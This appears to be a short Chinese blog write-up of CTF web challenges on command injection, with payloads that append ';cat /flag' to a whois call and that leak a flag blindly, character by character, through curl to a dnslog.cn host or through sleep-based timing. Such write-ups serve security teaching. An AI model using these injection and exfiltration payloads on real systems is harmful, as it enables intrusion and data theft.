前言

无。

CMD-1

直接执行命令:

cat /flag

CMD-2

同1。

CMD-3

与whois命令拼接,截断后执行命令:

;cat /flag

CMD-4

同3。

CMD-5

与某种DNS解析命令拼接,存在两个输入参数,但只用其中一个就可以解体。

由于命令结果不回显,需要通过延时或者外带的方式进行盲打,比如通过DNSLog外带:

;abb=`cat /flag | cut -c 6-21`;bbb=".lzth1m.dnslog.cn";curl $abb$bbb#

比如延时:

;eval 'if [ $(cat /flag|cut -c 1) = f ];then sleep 5; fi;';

CMD-6

同5。

Time_Based_RCE

CTF Web

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!

BUU XSS COURSE 1
关于上传文件题目绕过前端限制的方法